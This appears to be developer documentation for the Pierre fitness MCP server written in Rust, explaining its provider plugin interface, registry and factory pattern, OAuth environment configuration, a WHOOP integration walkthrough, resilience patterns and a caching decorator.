Note: COROS API access requires applying to their developer program at https://support.coros.com/hc/en-us/articles/17085887816340. Documentation is provided after approval.
Service Provider Interface (SPI)
The SPI defines the contract for pluggable providers, enabling external crates to register providers without modifying core code.
Providerdescriptor Trait
Source: src/providers/spi.rs:129-177
#![allow(unused)]
fn main() {
/// Service Provider Interface (SPI) for pluggable fitness providers
///
/// External provider crates implement this trait to describe their capabilities.
pub trait ProviderDescriptor: Send + Sync {
/// Unique provider identifier (e.g., "strava", "garmin", "whoop")
fn name(&self) -> &'static str;
/// Human-readable display name (e.g., "Strava", "Garmin Connect")
fn display_name(&self) -> &'static str;
/// Provider capabilities using bitflags
fn capabilities(&self) -> ProviderCapabilities;
/// OAuth endpoints (None for non-OAuth providers like synthetic)
fn oauth_endpoints(&self) -> Option<OAuthEndpoints>;
/// OAuth parameters (scope separator, PKCE, etc.)
fn oauth_params(&self) -> Option<OAuthParams>;
/// Base URL for API requests
fn api_base_url(&self) -> &'static str;
/// Default OAuth scopes for this provider
fn default_scopes(&self) -> &'static [&'static str];
}
}
Providercapabilities (Bitflags)
Provider capabilities use bitflags for efficient storage and combinators:
Source: src/providers/spi.rs:95-126
#![allow(unused)]
fn main() {
bitflags::bitflags! {
/// Provider capability flags using bitflags for efficient storage
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
pub struct ProviderCapabilities: u8 {
/// Provider supports OAuth 2.0 authentication
const OAUTH = 0b0000_0001;
/// Provider supports activity data (workouts, runs, rides)
const ACTIVITIES = 0b0000_0010;
/// Provider supports sleep tracking data
const SLEEP_TRACKING = 0b0000_0100;
/// Provider supports recovery metrics (HRV, strain)
const RECOVERY_METRICS = 0b0000_1000;
/// Provider supports health metrics (weight, body composition)
const HEALTH_METRICS = 0b0001_0000;
}
}
impl ProviderCapabilities {
/// Activity-only provider (OAuth + activities)
pub const fn activity_only() -> Self {
Self::OAUTH.union(Self::ACTIVITIES)
}
/// Full health provider (all capabilities)
pub const fn full_health() -> Self {
Self::OAUTH
.union(Self::ACTIVITIES)
.union(Self::SLEEP_TRACKING)
.union(Self::RECOVERY_METRICS)
.union(Self::HEALTH_METRICS)
}
}
}
Using capabilities:
#![allow(unused)]
fn main() {
// Check specific capability
if provider.capabilities().contains(ProviderCapabilities::SLEEP_TRACKING) {
// Provider supports sleep data
}
// Combine capabilities
let caps = ProviderCapabilities::OAUTH | ProviderCapabilities::ACTIVITIES;
// Use convenience constructors
let full_health = ProviderCapabilities::full_health();
}
Oauthparams
OAuth configuration varies by provider (scope separators, PKCE support):
Source: src/providers/spi.rs:85-93
#![allow(unused)]
fn main() {
/// OAuth parameters for provider-specific configuration
#[derive(Debug, Clone)]
pub struct OAuthParams {
/// Scope separator character (space for Fitbit, comma for Strava)
pub scope_separator: &'static str,
/// Whether to use PKCE (recommended for public clients)
pub use_pkce: bool,
/// Additional query parameters for authorization URL
pub additional_auth_params: &'static [(&'static str, &'static str)],
}
}
Provider Registry
The ProviderRegistry is the central hub for managing all fitness providers:
Source: src/providers/registry.rs:13-60
#![allow(unused)]
fn main() {
/// Central registry for all fitness providers with factory pattern
pub struct ProviderRegistry {
/// Map of provider names to their factories
factories: HashMap<String, Box<dyn ProviderFactory>>,
/// Default configurations for each provider (loaded from environment)
default_configs: HashMap<String, ProviderConfig>,
}
impl ProviderRegistry {
/// Create registry and auto-register all known providers
#[must_use]
pub fn new() -> Self {
let mut registry = Self {
factories: HashMap::new(),
default_configs: HashMap::new(),
};
// Register Strava provider with environment-based config
registry.register_factory(
oauth_providers::STRAVA,
Box::new(StravaProviderFactory),
);
let config = load_provider_env_config(
oauth_providers::STRAVA,
"https://www.strava.com/oauth/authorize",
"https://www.strava.com/oauth/token",
"https://www.strava.com/api/v3",
Some("https://www.strava.com/oauth/deauthorize"),
&[oauth_providers::STRAVA_DEFAULT_SCOPES.to_owned()],
);
registry.set_default_config(oauth_providers::STRAVA, /* config */);
// Register Garmin provider
registry.register_factory(
oauth_providers::GARMIN,
Box::new(GarminProviderFactory),
);
// ... Garmin config
// Register Synthetic provider (no OAuth needed!)
registry.register_factory(
oauth_providers::SYNTHETIC,
Box::new(SyntheticProviderFactory),
);
// ... Synthetic config
registry
}
/// Register a provider factory for runtime creation
pub fn register_factory(&mut self, name: &str, factory: Box<dyn ProviderFactory>) {
self.factories.insert(name.to_owned(), factory);
}
/// Check if provider is supported (dynamic discovery)
#[must_use]
pub fn is_supported(&self, provider: &str) -> bool {
self.factories.contains_key(provider)
}
/// Get all supported provider names (1 to x providers)
#[must_use]
pub fn supported_providers(&self) -> Vec<String> {
self.factories.keys().map(ToString::to_string).collect()
}
/// Create provider instance from factory
pub fn create_provider(&self, name: &str) -> Option<Box<dyn FitnessProvider>> {
let factory = self.factories.get(name)?;
let config = self.default_configs.get(name)?.clone();
Some(factory.create(config))
}
}
}
Registry responsibilities:
- Factory storage: Maps provider names to factory implementations
- Dynamic discovery:
is_supported()andsupported_providers()enable runtime introspection - Configuration management: Stores default configs loaded from environment
- Provider creation:
create_provider()instantiates providers on-demand
Provider Factory Pattern
Each provider implements a ProviderFactory trait for creation:
Source: src/providers/core.rs:173-180
#![allow(unused)]
fn main() {
/// Provider factory for creating instances
pub trait ProviderFactory: Send + Sync {
/// Create a new provider instance with the given configuration
fn create(&self, config: ProviderConfig) -> Box<dyn FitnessProvider>;
/// Get supported provider names (for multi-provider factories)
fn supported_providers(&self) -> &'static [&'static str];
}
}
Example: Strava factory:
Source: src/providers/registry.rs:20-28
#![allow(unused)]
fn main() {
/// Factory for creating Strava provider instances
struct StravaProviderFactory;
impl ProviderFactory for StravaProviderFactory {
fn create(&self, config: ProviderConfig) -> Box<dyn FitnessProvider> {
Box::new(StravaProvider::new(config))
}
fn supported_providers(&self) -> &'static [&'static str] {
&["strava"]
}
}
}
Example: Synthetic factory (Phase 1):
Source: src/providers/registry.rs:30-38
#![allow(unused)]
fn main() {
/// Factory for creating Synthetic provider instances
struct SyntheticProviderFactory;
impl ProviderFactory for SyntheticProviderFactory {
fn create(&self, _config: ProviderConfig) -> Box<dyn FitnessProvider> {
Box::new(SyntheticProvider::default())
}
fn supported_providers(&self) -> &'static [&'static str] {
&["synthetic"]
}
}
}
Factory pattern benefits:
- Lazy instantiation: Providers created only when needed
- Configuration injection: Factory receives config at creation time
- Type erasure: Returns
Box<dyn FitnessProvider>for uniform handling
Environment-Based Configuration
Pierre loads provider configuration from environment variables for cloud-native deployment (GCP, AWS, etc.):
Configuration schema:
# Default provider (1 required, used when no provider specified)
export PIERRE_DEFAULT_PROVIDER=strava # or garmin, synthetic, custom
# Per-provider configuration (repeat for each provider 1 to x)
export PIERRE_STRAVA_CLIENT_ID=your-client-id
export PIERRE_STRAVA_CLIENT_SECRET=your-secret
export PIERRE_STRAVA_AUTH_URL=https://www.strava.com/oauth/authorize
export PIERRE_STRAVA_TOKEN_URL=https://www.strava.com/oauth/token
export PIERRE_STRAVA_API_BASE_URL=https://www.strava.com/api/v3
export PIERRE_STRAVA_REVOKE_URL=https://www.strava.com/oauth/deauthorize
export PIERRE_STRAVA_SCOPES="activity:read_all,profile:read_all"
# Garmin provider
export PIERRE_GARMIN_CLIENT_ID=your-consumer-key
export PIERRE_GARMIN_CLIENT_SECRET=your-consumer-secret
# ... Garmin URLs and scopes
# Synthetic provider (no OAuth needed - perfect for dev/testing!)
# No env vars required - automatically available
Loading configuration:
Source: src/config/environment.rs:2093-2174
#![allow(unused)]
fn main() {
/// Load provider-specific configuration from environment variables
///
/// Falls back to provided defaults if environment variables are not set.
/// Supports legacy env vars (STRAVA_CLIENT_ID) for backward compatibility.
#[must_use]
pub fn load_provider_env_config(
provider: &str,
default_auth_url: &str,
default_token_url: &str,
default_api_base_url: &str,
default_revoke_url: Option<&str>,
default_scopes: &[String],
) -> ProviderEnvConfig {
let provider_upper = provider.to_uppercase();
// Load client credentials with fallback to legacy env vars
let client_id = env::var(format!("PIERRE_{provider_upper}_CLIENT_ID"))
.or_else(|_| env::var(format!("{provider_upper}_CLIENT_ID")))
.ok();
let client_secret = env::var(format!("PIERRE_{provider_upper}_CLIENT_SECRET"))
.or_else(|_| env::var(format!("{provider_upper}_CLIENT_SECRET")))
.ok();
// Load URLs with defaults
let auth_url = env::var(format!("PIERRE_{provider_upper}_AUTH_URL"))
.unwrap_or_else(|_| default_auth_url.to_owned());
// ... load other fields
(client_id, client_secret, auth_url, token_url, api_base_url, revoke_url, scopes)
}
}
Backward compatibility:
- New format:
PIERRE_STRAVA_CLIENT_ID(preferred) - Legacy format:
STRAVA_CLIENT_ID(still supported) - Graceful fallback: Tries new format first, then legacy
Dynamic Provider Discovery
Connection tools automatically discover available providers at runtime:
Source: src/protocols/universal/handlers/connections.rs:84-88
#![allow(unused)]
fn main() {
// Multi-provider mode - check all supported providers from registry
let providers_to_check = executor.resources.provider_registry.supported_providers();
let mut providers_status = serde_json::Map::new();
for provider in providers_to_check {
let is_connected = matches!(
executor
.auth_service
.get_valid_token(user_uuid, provider, request.tenant_id.as_deref())
.await,
Ok(Some(_))
);
providers_status.insert(
provider.to_owned(),
serde_json::json!({
"connected": is_connected,
"status": if is_connected { "connected" } else { "disconnected" }
}),
);
}
}
Dynamic provider validation:
Source: src/protocols/universal/handlers/connections.rs:224-228
#![allow(unused)]
fn main() {
/// Validate that provider is supported using provider registry
fn is_provider_supported(
provider: &str,
provider_registry: &crate::providers::ProviderRegistry,
) -> bool {
provider_registry.is_supported(provider)
}
}
Dynamic error messages:
Source: src/protocols/universal/handlers/connections.rs:333-340
#![allow(unused)]
fn main() {
if !is_provider_supported(provider, &executor.resources.provider_registry) {
let supported_providers = executor
.resources
.provider_registry
.supported_providers()
.join(", ");
return Ok(connection_error(format!(
"Provider '{provider}' is not supported. Supported providers: {supported_providers}"
)));
}
}
Result: Error messages automatically update when you add/remove providers. No hardcoded lists!
Synthetic Provider (phase 1)
Pierre includes a synthetic provider for development and testing without OAuth:
Source: src/providers/synthetic_provider.rs:30-79
#![allow(unused)]
fn main() {
/// Synthetic fitness provider for development and testing (no OAuth required!)
///
/// This provider generates realistic fitness data without connecting to external APIs.
/// Perfect for:
/// - Development without OAuth credentials
/// - Integration tests
/// - Demo environments
/// - CI/CD pipelines
pub struct SyntheticProvider {
activities: Arc<RwLock<Vec<Activity>>>,
activity_index: Arc<RwLock<HashMap<String, Activity>>>,
config: ProviderConfig,
}
impl SyntheticProvider {
/// Create provider with pre-populated synthetic activities
#[must_use]
pub fn with_activities(activities: Vec<Activity>) -> Self {
let mut index = HashMap::new();
for activity in &activities {
index.insert(activity.id.clone(), activity.clone());
}
Self {
activities: Arc::new(RwLock::new(activities)),
activity_index: Arc::new(RwLock::new(index)),
config: ProviderConfig {
name: oauth_providers::SYNTHETIC.to_owned(),
auth_url: "http://localhost:8081/synthetic/auth".to_owned(),
token_url: "http://localhost:8081/synthetic/token".to_owned(),
api_base_url: "http://localhost:8081/synthetic/api".to_owned(),
revoke_url: None,
default_scopes: vec!["read:all".to_owned()],
},
}
}
}
}
Synthetic provider benefits:
- No OAuth dance: Skip authorization flows during development
- Deterministic data: Same activities every time for testing
- Fast iteration: No network calls, instant responses
- CI/CD friendly: No API keys or secrets needed
- Always available: Listed in
supported_providers()
Default provider selection:
Source: src/config/environment.rs:2060-2078
#![allow(unused)]
fn main() {
/// Get default provider from PIERRE_DEFAULT_PROVIDER or fallback to "synthetic"
#[must_use]
pub fn default_provider() -> String {
use crate::constants::oauth_providers;
env::var("PIERRE_DEFAULT_PROVIDER")
.ok()
.filter(|s| !s.is_empty())
.unwrap_or_else(|| oauth_providers::SYNTHETIC.to_owned())
}
}
Fallback hierarchy:
PIERRE_DEFAULT_PROVIDER=strava→ use StravaPIERRE_DEFAULT_PROVIDER=garmin→ use Garmin- Not set or empty → use Synthetic (OAuth-free development)
Adding a Custom Provider SPI Approach)
Here’s how to add a new provider using the SPI architecture:
Step 1: Add Feature Flag
Source: Cargo.toml
[features]
provider-whoop = []
all-providers = ["provider-strava", "provider-garmin", "provider-terra", "provider-fitbit", "provider-whoop", "provider-coros", "provider-synthetic"]
Step 2: Implement Providerdescriptor (SPI)
Source: src/providers/spi.rs
#![allow(unused)]
fn main() {
use pierre_mcp_server::providers::spi::{
ProviderDescriptor, OAuthEndpoints, OAuthParams, ProviderCapabilities
};
/// WHOOP provider descriptor for SPI registration
#[cfg(feature = "provider-whoop")]
pub struct WhoopDescriptor;
#[cfg(feature = "provider-whoop")]
impl ProviderDescriptor for WhoopDescriptor {
fn name(&self) -> &'static str {
"whoop"
}
fn display_name(&self) -> &'static str {
"WHOOP"
}
fn capabilities(&self) -> ProviderCapabilities {
// WHOOP supports all health features - use bitflags combinator
ProviderCapabilities::full_health()
}
fn oauth_endpoints(&self) -> Option<OAuthEndpoints> {
Some(OAuthEndpoints {
auth_url: "https://api.prod.whoop.com/oauth/oauth2/auth",
token_url: "https://api.prod.whoop.com/oauth/oauth2/token",
revoke_url: Some("https://api.prod.whoop.com/oauth/oauth2/revoke"),
})
}
fn oauth_params(&self) -> Option<OAuthParams> {
Some(OAuthParams {
scope_separator: " ", // Space-separated scopes
use_pkce: true, // PKCE recommended
additional_auth_params: &[],
})
}
fn api_base_url(&self) -> &'static str {
"https://api.prod.whoop.com/developer/v1"
}
fn default_scopes(&self) -> &'static [&'static str] {
&["read:profile", "read:workout", "read:sleep", "read:recovery"]
}
}
}
Step 3: Implement Fitnessprovider Trait
Source: src/providers/whoop_provider.rs
#![allow(unused)]
fn main() {
use pierre_mcp_server::providers::core::{FitnessProvider, ProviderConfig, OAuth2Credentials};
use pierre_mcp_server::models::{Activity, Athlete, Stats};
use pierre_mcp_server::errors::AppResult;
use async_trait::async_trait;
use std::sync::{Arc, RwLock};
#[cfg(feature = "provider-whoop")]
pub struct WhoopProvider {
config: ProviderConfig,
credentials: Arc<RwLock<Option<OAuth2Credentials>>>,
http_client: reqwest::Client,
}
#[cfg(feature = "provider-whoop")]
#[async_trait]
impl FitnessProvider for WhoopProvider {
fn name(&self) -> &'static str {
"whoop"
}
fn config(&self) -> &ProviderConfig {
&self.config
}
async fn set_credentials(&self, credentials: OAuth2Credentials) -> AppResult<()> {
// Store credentials using RwLock for interior mutability
let mut creds = self.credentials.write()
.map_err(|_| pierre_mcp_server::providers::errors::ProviderError::ConfigurationError(
"Failed to acquire credentials lock".to_owned()
))?;
*creds = Some(credentials);
Ok(())
}
async fn get_athlete(&self) -> AppResult<Athlete> {
// Real implementation: fetch from WHOOP API and convert to unified model
Ok(Athlete {
id: "whoop-user-123".to_owned(),
username: "athlete".to_owned(),
firstname: Some("WHOOP".to_owned()),
lastname: Some("User".to_owned()),
profile_picture: None,
provider: "whoop".to_owned(),
})
}
async fn get_activities(
&self,
_limit: Option<usize>,
_offset: Option<usize>,
) -> AppResult<Vec<Activity>> {
// Real implementation: fetch workouts from WHOOP API
Ok(vec![])
}
// ... implement remaining trait methods
}
}
Step 4: Create Provider Factory and Register
Source: src/providers/registry.rs
#![allow(unused)]
fn main() {
#[cfg(feature = "provider-whoop")]
use super::whoop_provider::WhoopProvider;
#[cfg(feature = "provider-whoop")]
use super::spi::WhoopDescriptor;
/// Factory for creating WHOOP provider instances
#[cfg(feature = "provider-whoop")]
struct WhoopProviderFactory;
#[cfg(feature = "provider-whoop")]
impl ProviderFactory for WhoopProviderFactory {
fn create(&self, config: ProviderConfig) -> Box<dyn FitnessProvider> {
Box::new(WhoopProvider::new(config))
}
fn supported_providers(&self) -> &'static [&'static str] {
&["whoop"]
}
}
// In ProviderRegistry::new():
#[cfg(feature = "provider-whoop")]
{
let descriptor = WhoopDescriptor;
registry.register_factory("whoop", Box::new(WhoopProviderFactory));
// Config loaded from descriptor's oauth_endpoints() and default_scopes()
}
}
Step 5: Add to Constants and Module Exports
Source: src/constants/oauth/providers.rs
#![allow(unused)]
fn main() {
#[cfg(feature = "provider-whoop")]
pub const WHOOP: &str = "whoop";
#[cfg(feature = "provider-whoop")]
pub const WHOOP_DEFAULT_SCOPES: &str = "read:profile read:workout read:sleep read:recovery";
}
Source: src/providers/mod.rs
#![allow(unused)]
fn main() {
#[cfg(feature = "provider-whoop")]
pub mod whoop_provider;
#[cfg(feature = "provider-whoop")]
pub use spi::WhoopDescriptor;
}
Step 6: Configure Environment
Source: .envrc
# WHOOP provider configuration
export WHOOP_CLIENT_ID=your-whoop-client-id
export WHOOP_CLIENT_SECRET=your-whoop-secret
export WHOOP_REDIRECT_URI=http://localhost:8081/api/oauth/callback/whoop
That’s it! WHOOP is now:
- ✅ Conditionally compiled with
--features provider-whoop - ✅ Available in
supported_providers()when feature enabled - ✅ Discoverable via
is_supported("whoop") - ✅ Creatable via
create_provider("whoop") - ✅ Listed in connection status responses
- ✅ Supported in
connect_providertool - ✅ Capabilities queryable via bitflags
No changes needed:
- ❌ Connection handlers (dynamic discovery)
- ❌ Tool implementations (use FitnessProvider trait)
- ❌ MCP schema generation (automatic)
- ❌ Test fixtures (provider-agnostic)
Managing 1 to X Providers Simultaneously
Pierre’s architecture supports multiple active providers per tenant/user:
Multi-provider connection status:
{
"success": true,
"result": {
"providers": {
"strava": {
"connected": true,
"status": "connected"
},
"garmin": {
"connected": true,
"status": "connected"
},
"fitbit": {
"connected": false,
"status": "disconnected"
},
"coros": {
"connected": true,
"status": "connected"
},
"synthetic": {
"connected": true,
"status": "connected"
},
"whoop": {
"connected": true,
"status": "connected"
}
}
}
}
Data aggregation across providers:
#![allow(unused)]
fn main() {
// Pseudo-code for fetching activities from all connected providers
async fn get_all_activities(user_id: Uuid, tenant_id: Uuid) -> Vec<Activity> {
let mut all_activities = Vec::new();
for provider_name in registry.supported_providers() {
if let Ok(Some(provider)) = create_authenticated_provider(
user_id,
tenant_id,
provider_name,
).await {
if let Ok(activities) = provider.get_activities(Some(50), None).await {
all_activities.extend(activities);
}
}
}
// Deduplicate and merge activities from multiple providers
all_activities.sort_by(|a, b| b.start_date.cmp(&a.start_date));
all_activities
}
}
Provider switching:
#![allow(unused)]
fn main() {
// Tools accept optional provider parameter
let provider_name = request
.parameters
.get("provider")
.and_then(|v| v.as_str())
.unwrap_or(&default_provider());
let provider = registry.create_provider(provider_name)
.ok_or_else(|| ProtocolError::ProviderNotFound)?;
}
Shared request/response Traits
All providers implement the same FitnessProvider trait, ensuring uniform request/response patterns:
Request side (method parameters):
- IDs:
&strfor activity/athlete IDs - Pagination:
PaginationParamsstruct - Date ranges:
DateTime<Utc>for time-based queries - Options:
Option<T>for optional filters
Response side (domain models):
- Activity: Unified workout representation
- Athlete: User profile information
- Stats: Aggregate performance metrics
- PersonalRecord: Best achievements
- SleepSession, RecoveryMetrics, HealthMetrics: Health data
Shared error handling:
- AppResult
: All providers return the same result type - ProviderError: Structured error enum with retry information
- Consistent mapping: Provider-specific errors →
ProviderError
Benefits:
- Swappable: Change from Strava to Garmin without modifying tool code
- Testable: Mock any provider using
FitnessProvidertrait - Type-safe: Compiler enforces contract across all providers
- Extensible: New providers must implement complete interface
Rust Idioms: Trait Object Factory
Source: src/providers/registry.rs:43-46
#![allow(unused)]
fn main() {
pub fn register_factory(&mut self, name: &str, factory: Box<dyn ProviderFactory>) {
self.factories.insert(name.to_owned(), factory);
}
}
Trait objects:
Box<dyn ProviderFactory>: Heap-allocated trait object with dynamic dispatch- Dynamic dispatch: Method calls resolved at runtime (vtable lookup)
- Polymorphism: Registry stores different factory types (Strava, Garmin, etc.)
- Type erasure: Concrete factory type erased, only trait methods accessible
Alternative (static dispatch):
#![allow(unused)]
fn main() {
// Generic approach (static dispatch)
pub fn register_factory<F: ProviderFactory + 'static>(&mut self, name: &str, factory: F) {
// Can't store different F types in same HashMap!
}
}
Why trait objects: Registry needs to store heterogeneous factory types in single collection.
Rust Idioms: arc<rwlock> for Interior Mutability
Source: src/providers/synthetic_provider.rs:34-36
#![allow(unused)]
fn main() {
pub struct SyntheticProvider {
activities: Arc<RwLock<Vec<Activity>>>,
activity_index: Arc<RwLock<HashMap<String, Activity>>>,
config: ProviderConfig,
}
}
Pattern explanation:
- Arc: Atomic reference counting for shared ownership across threads
- RwLock: Reader-writer lock allowing multiple readers OR single writer
- Interior mutability: Mutate data inside
&self(FitnessProvider trait uses&self)
Why needed:
#![allow(unused)]
fn main() {
#[async_trait]
pub trait FitnessProvider: Send + Sync {
async fn get_activities(&self, ...) -> Result<Vec<Activity>>;
// ^^^^^ immutable reference
}
}
Without RwLock (doesn’t compile):
#![allow(unused)]
fn main() {
impl FitnessProvider for SyntheticProvider {
async fn get_activities(&self, ...) -> Result<Vec<Activity>> {
self.activities.push(...); // ❌ Can't mutate through &self
}
}
}
With RwLock (compiles):
#![allow(unused)]
fn main() {
impl FitnessProvider for SyntheticProvider {
async fn get_activities(&self, ...) -> Result<Vec<Activity>> {
let activities = self.activities.read().await; // ✅ Interior mutability
Ok(activities.clone())
}
}
}
Provider Resilience Patterns
Pierre implements multiple resilience patterns to handle provider failures gracefully.
Retry with Exponential Backoff
Source: src/providers/core.rs (conceptual)
#![allow(unused)]
fn main() {
/// Retry configuration for provider requests
pub struct RetryConfig {
/// Maximum number of retry attempts
pub max_retries: u32,
/// Base delay between retries (doubles each attempt)
pub base_delay_ms: u64,
/// Maximum delay cap
pub max_delay_ms: u64,
/// Jitter factor (0.0 to 1.0) to prevent thundering herd
pub jitter_factor: f64,
}
impl Default for RetryConfig {
fn default() -> Self {
Self {
max_retries: 3,
base_delay_ms: 100,
max_delay_ms: 5000,
jitter_factor: 0.1,
}
}
}
}
Retry logic:
#![allow(unused)]
fn main() {
async fn fetch_with_retry<T, F, Fut>(
operation: F,
config: &RetryConfig,
) -> Result<T, ProviderError>
where
F: Fn() -> Fut,
Fut: Future<Output = Result<T, ProviderError>>,
{
let mut attempt = 0;
loop {
match operation().await {
Ok(result) => return Ok(result),
Err(e) if e.is_retryable() && attempt < config.max_retries => {
attempt += 1;
let delay = calculate_backoff(attempt, config);
tokio::time::sleep(Duration::from_millis(delay)).await;
}
Err(e) => return Err(e),
}
}
}
fn calculate_backoff(attempt: u32, config: &RetryConfig) -> u64 {
let base = config.base_delay_ms * 2u64.pow(attempt - 1);
let jitter = (base as f64 * config.jitter_factor * rand::random::<f64>()) as u64;
(base + jitter).min(config.max_delay_ms)
}
}
Rate Limit Respect
Providers return Retry-After headers when rate limited:
#![allow(unused)]
fn main() {
match provider.get_activities().await {
Err(ProviderError::RateLimitExceeded { retry_after_secs, .. }) => {
tracing::warn!(
provider = %provider.name(),
retry_after = retry_after_secs,
"Provider rate limited, scheduling retry"
);
// Queue for later execution
scheduler.schedule_retry(request, retry_after_secs).await;
Ok(PendingResult::Scheduled)
}
result => result,
}
}
Token Auto-Refresh
OAuth tokens are automatically refreshed before expiration:
Source: src/oauth2_client/flow_manager.rs (conceptual)
#![allow(unused)]
fn main() {
/// Check if token needs refresh (5 minute buffer)
fn needs_refresh(token: &UserOAuthToken) -> bool {
if let Some(expires_at) = token.expires_at {
let refresh_buffer = Duration::from_secs(300); // 5 minutes
expires_at - refresh_buffer < Utc::now()
} else {
false
}
}
/// Transparently refresh token before provider call
async fn ensure_valid_token(
db: &Database,
user_id: Uuid,
tenant_id: &str,
provider: &str,
) -> Result<String, ProviderError> {
let token = db.oauth_tokens().get(user_id, tenant_id, provider).await?;
if needs_refresh(&token) {
let refreshed = refresh_token(&token).await?;
db.oauth_tokens().upsert(&refreshed).await?;
Ok(refreshed.access_token)
} else {
Ok(token.access_token)
}
}
}
Graceful Degradation
When a provider is unavailable, Pierre continues serving from cache:
#![allow(unused)]
fn main() {
/// Fetch activities with cache fallback
async fn get_activities_resilient(
provider: &dyn FitnessProvider,
cache: &Cache,
user_id: Uuid,
) -> Result<Vec<Activity>, ProviderError> {
let cache_key = format!("activities:{}:{}", provider.name(), user_id);
match provider.get_activities(user_id).await {
Ok(activities) => {
// Update cache on success
cache.set(&cache_key, &activities, Duration::from_secs(3600)).await;
Ok(activities)
}
Err(e) if e.is_transient() => {
// Try cache on transient errors
if let Some(cached) = cache.get::<Vec<Activity>>(&cache_key).await {
tracing::warn!(
provider = %provider.name(),
error = %e,
"Provider unavailable, serving from cache"
);
Ok(cached)
} else {
Err(e)
}
}
Err(e) => Err(e),
}
}
}
Provider Health Checks
Monitor provider availability proactively:
#![allow(unused)]
fn main() {
/// Provider health status
#[derive(Debug, Clone)]
pub struct ProviderHealth {
pub provider: String,
pub is_healthy: bool,
pub last_check: DateTime<Utc>,
pub consecutive_failures: u32,
pub average_latency_ms: f64,
}
/// Check provider health via lightweight endpoint
async fn check_provider_health(provider: &dyn FitnessProvider) -> ProviderHealth {
let start = Instant::now();
let result = provider.health_check().await;
let latency = start.elapsed().as_millis() as f64;
ProviderHealth {
provider: provider.name().to_string(),
is_healthy: result.is_ok(),
last_check: Utc::now(),
consecutive_failures: if result.is_ok() { 0 } else { 1 },
average_latency_ms: latency,
}
}
}
Multi-Provider Fallback
When primary provider fails, try alternatives:
#![allow(unused)]
fn main() {
/// Try multiple providers in order
async fn get_activities_multi_provider(
registry: &ProviderRegistry,
user_id: Uuid,
preferred_providers: &[&str],
) -> Result<Vec<Activity>, ProviderError> {
let mut last_error = None;
for provider_name in preferred_providers {
if let Some(provider) = registry.get(provider_name) {
match provider.get_activities(user_id).await {
Ok(activities) => return Ok(activities),
Err(e) => {
tracing::warn!(
provider = provider_name,
error = %e,
"Provider failed, trying next"
);
last_error = Some(e);
}
}
}
}
Err(last_error.unwrap_or_else(|| ProviderError::NoProvidersAvailable))
}
}
Resilience Configuration
Per-provider resilience settings:
# config/providers.toml (conceptual)
[strava]
max_retries = 3
base_delay_ms = 100
timeout_secs = 30
circuit_breaker_threshold = 5
circuit_breaker_reset_secs = 60
[garmin]
max_retries = 5 # Garmin is slower, more retries
base_delay_ms = 200
timeout_secs = 60
Caching Provider Decorator
Pierre provides a CachingFitnessProvider decorator that wraps any FitnessProvider with transparent caching using the cache-aside pattern. This significantly reduces API calls to external providers.
Cache-Aside Pattern
Source: src/providers/caching_provider.rs
#![allow(unused)]
fn main() {
/// Caching wrapper for any FitnessProvider implementation
pub struct CachingFitnessProvider<C: CacheProvider> {
/// The underlying provider being wrapped
inner: Box<dyn FitnessProvider>,
/// Cache backend (Redis or in-memory)
cache: Arc<C>,
/// Tenant ID for cache key isolation
tenant_id: Uuid,
/// User ID for cache key isolation
user_id: Uuid,
/// TTL configuration for different resource types
ttl_config: CacheTtlConfig,
}
}
How it works:
- Check cache for requested data
- If cache hit: return cached data immediately
- If cache miss: fetch from provider API, store in cache, return data
#![allow(unused)]
fn main() {
// Create a caching provider
let cached_provider = CachingFitnessProvider::new(
provider, // Any Box<dyn FitnessProvider>
cache, // InMemoryCache or RedisCache
tenant_id,
user_id,
);
// Use normally - caching is transparent
let activities = cached_provider.get_activities(Some(10), None).await?;
}
Cache Policy Control
The CachePolicy enum allows explicit control over caching behavior:
Source: src/providers/caching_provider.rs
#![allow(unused)]
fn main() {
/// Cache policy for controlling caching behavior per-request
pub enum CachePolicy {
/// Use cache if available, fetch and cache on miss (default)
UseCache,
/// Bypass cache entirely, always fetch fresh data
Bypass,
/// Invalidate existing cache entry, fetch fresh, update cache
Refresh,
}
}
Usage:
#![allow(unused)]
fn main() {
// Default behavior - use cache
let activities = cached_provider.get_activities(Some(10), None).await?;
// Force fresh data (user-triggered refresh)
let fresh = cached_provider
.get_activities_with_policy(Some(10), None, CachePolicy::Refresh)
.await?;
// Bypass cache entirely (debugging)
let uncached = cached_provider
.get_activities_with_policy(Some(10), None, CachePolicy::Bypass)
.await?;
}
TTL Configuration
Different resources have different cache durations based on data volatility:
| Resource | TTL | Rationale |
|---|---|---|
AthleteProfile | 24 hours | Profiles rarely change |
ActivityList | 15 minutes | Need fresh for new activities |
Activity | 1 hour | Activity details immutable after creation |
Stats | 6 hours | Aggregates don’t need real-time freshness |
Source: src/constants/cache.rs
#![allow(unused)]
fn main() {
pub const DEFAULT_PROFILE_TTL_SECS: u64 = 86_400; // 24 hours
pub const DEFAULT_ACTIVITY_LIST_TTL_SECS: u64 = 900; // 15 minutes
pub const DEFAULT_ACTIVITY_TTL_SECS: u64 = 3_600; // 1 hour
pub const DEFAULT_STATS_TTL_SECS: u64 = 21_600; // 6 hours
}
Cache Key Structure
Cache keys include tenant/user/provider isolation for multi-tenant safety:
tenant:{tenant_id}:user:{user_id}:provider:{provider}:{resource_type}
Examples:
tenant:abc123:user:def456:provider:strava:athlete_profile
tenant:abc123:user:def456:provider:strava:activity_list:page:1:per_page:50
tenant:abc123:user:def456:provider:strava:activity:12345678
Cache Invalidation
Automatic invalidation on disconnect:
#![allow(unused)]
fn main() {
// When user disconnects, cache is automatically cleared
impl<C: CacheProvider> FitnessProvider for CachingFitnessProvider<C> {
async fn disconnect(&self) -> AppResult<()> {
// Invalidate all user's cache entries
self.invalidate_user_cache().await?;
self.inner.disconnect().await
}
}
}
Manual invalidation (for webhooks):
#![allow(unused)]
fn main() {
// Invalidate when new activity detected via webhook
cached_provider.invalidate_activity_list_cache().await?;
// Invalidate all user cache
cached_provider.invalidate_user_cache().await?;
}
Factory Methods
Using the registry:
#![allow(unused)]
fn main() {
// Create a caching provider via registry
let cached_provider = registry
.create_caching_provider("strava", cache_config, tenant_id, user_id)
.await?;
// Or use the global convenience function
let cached_provider = create_caching_provider_global(
"strava",
cache_config,
tenant_id,
user_id,
).await?;
}
Cache Backend Selection
The caching provider supports both in-memory and Redis backends:
# Use Redis (production/multi-instance)
export REDIS_URL=redis://localhost:6379
# No REDIS_URL = use in-memory LRU cache (dev/single-instance)
Benefits of caching:
- Reduced API calls: Bounded by TTL, not request volume
- Faster responses: Sub-millisecond cache hits vs 100ms+ API calls
- Rate limit protection: Fewer calls = less risk of hitting limits
